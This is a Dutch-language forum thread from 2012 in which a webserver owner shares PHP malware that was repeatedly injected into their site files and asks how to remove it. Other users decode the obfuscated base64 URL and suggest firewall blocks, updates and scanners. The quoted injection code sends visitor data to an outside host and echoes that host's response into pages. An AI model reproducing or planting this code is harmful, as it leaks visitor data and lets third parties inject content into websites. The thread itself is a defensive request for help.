Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Conintue last van virus/worm op webserver/directadmin

Pagina: 1
Acties:

Verwijderd

Topicstarter
Het afgelopen jaar raken continue diverse domeinen binnen mijn webserver besmet met een Curl code. Ik heb géén idee wat het doet, maar het plakt zichzelf automatisch in bestanden met triviale namen zoals index.php, home.php, footer.php, et cetera, die ik vervolgens allemaal handmatig langs ga om die code te verwijderen. Ik zit op DirectAdmin. De code ziet er als volgt uit:

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>


Iemand anders bekend met dit probleem? Hoe ontwijk ik deze code en wat doet het precies?

  • RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
Zorgen dat alles up-to-date is :? Zorgen dat je geen FTP client gebruikt die wachtwoorden in plain text opslaat? Wat heb je zelf al geprobeerd/gezocht/gevonden?

Waar hoort mijn topic?
WEB >> B&V

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij


  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA== is een base64-hash, decode dat eens en je krijgt waarschijnlijk een website die je kan blocken op je firewall.

EDIT:
Dat wordt uiteindelijk http://botupdatestatistic.com/stat/stat.php, google daar eens op en block de URL in je firewall.

[ Voor 27% gewijzigd door CH4OS op 29-05-2012 21:54 ]


  • Lorem_Ipsum
  • Registratie: December 2010
  • Laatst online: 28-11 07:54
De decode van de base64 is iig http://botupdatestatistic.com/stat/stat.php :)

  • Fish
  • Registratie: Juli 2002
  • Niet online

Fish

How much is the fish

is http:// botupdatestatistic.com /stat/stat.php maar dan zonder spaties.

als je stat/.. weglaat redirect naar botsvsbrowsers

Iperf


  • kishan4uall
  • Registratie: September 2008
  • Laatst online: 18-11 09:09

kishan4uall

kiesjan mag ook

Even een deel code gegoogled en kwam hierop:
http://www.peterrosenmai....ng-visible-only-to-google

desktop, laptop


  • Megamind
  • Registratie: Augustus 2002
  • Laatst online: 10-09 22:45
Zorg ervoor dat je deze plugin op je DA hebt staan: ConfigServer Security & Firewall - csf v5.53

Die zal een report kunnen uitdraaien met zwakke plekken. Ik heb ook een tijd last van dit soort spam gehad, na deze update is er veel verdwenen. Het kunnen gewoon php lekken zijn in bepaalde stukken software (Joomla, Wordpress etc).

  • martin149
  • Registratie: Augustus 2009
  • Laatst online: 03-11 22:01
Ik houd het kort. Dit wil heel vaak werken. We hadden ook een probleem met terugkerende codefragmenten. probeer daarom dit maar eens: (werkt ook op iets anders dan WP)
http://www.php-beginners....hack-malware-scanner.html

[ Voor 7% gewijzigd door martin149 op 29-05-2012 22:01 ]


Verwijderd

Topicstarter
RobIII schreef op dinsdag 29 mei 2012 @ 21:50:
[...]

Zorgen dat alles up-to-date is :? Zorgen dat je geen FTP client gebruikt die wachtwoorden in plain text opslaat? Wat heb je zelf al geprobeerd/gezocht/gevonden?

Waar hoort mijn topic?
WEB >> B&V
Jup, dat advies had ik eerder al eens gelezen na enig zoekwerk op Google, om het zekere voor het onzekere te nemen had ik besloten om überhaupt geen ftp cliënts zoals filezilla te gebruiken, alles ging via DA... en toch :'(

Verwijderd

Topicstarter
CptChaos schreef op dinsdag 29 mei 2012 @ 21:53:
aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA== is een base64-hash, decode dat eens en je krijgt waarschijnlijk een website die je kan blocken op je firewall.

EDIT:
Dat wordt uiteindelijk http://botupdatestatistic.com/stat/stat.php, google daar eens op en block de URL in je firewall.
Heb je wellicht de exacte route naar de firewall binnen DA? Ik heb even rondgesnuffeld in DA maar kwam niets tegen dat op iets van een firewall lijkt...

  • Megamind
  • Registratie: Augustus 2002
  • Laatst online: 10-09 22:45
Verwijderd schreef op dinsdag 29 mei 2012 @ 22:28:
[...]


Heb je wellicht de exacte route naar de firewall binnen DA? Ik heb even rondgesnuffeld in DA maar kwam niets tegen dat op iets van een firewall lijkt...
Heb je mijn post al gelezen :?

Verwijderd

Topicstarter
Megamind schreef op dinsdag 29 mei 2012 @ 22:30:
[...]

Heb je mijn post al gelezen :?
Jazeker, maar ik dacht dat deze plugin lost stond van de firewall suggestie, ik heb mijn provider een mail gestuurd met het verzoek om de door jou genoemde plugin te installeren op mijn vps.

  • Megamind
  • Registratie: Augustus 2002
  • Laatst online: 10-09 22:45
Als het een VPS is waar je zelf niet bij kan dan wordt het sowieso denk ik lastig :P Er zitten nogal wat opties in die zelfs hercompilen van PHP vereisen. Dit maakt je omgeving wel een stuk robuuster maar je zal er wel wat tijd in moeten steken (alle stappen worden wel stap voor stap uitegelegd).

Verwijderd

Topicstarter
Het viel me al op dat de bezoekersaantallen van één van mijn grotere websites significant teruggelopen was de afgelopen week, bezoekers afkomstig van Google zijn bijna gehalveerd, in één week tijd.

Ik weet nou niet of de website getroffen is door een recente update van Google, of dat het door die code komt die mogelijk spam links in de pagina's heeft gestopt (al heb ik geen links in de Google Cache kunnen vinden die spam bevatten...), zoals beschreven hier.

Verwijderd

Topicstarter
Megamind schreef op dinsdag 29 mei 2012 @ 22:45:
Als het een VPS is waar je zelf niet bij kan dan wordt het sowieso denk ik lastig :P Er zitten nogal wat opties in die zelfs hercompilen van PHP vereisen. Dit maakt je omgeving wel een stuk robuuster maar je zal er wel wat tijd in moeten steken (alle stappen worden wel stap voor stap uitegelegd).
Ah verrek, krijg net een (vrij snelle) reactie terug van mijn provider, kost nogal wat centjes om de des betreffende CSF te installeren... ;(
Pagina: 1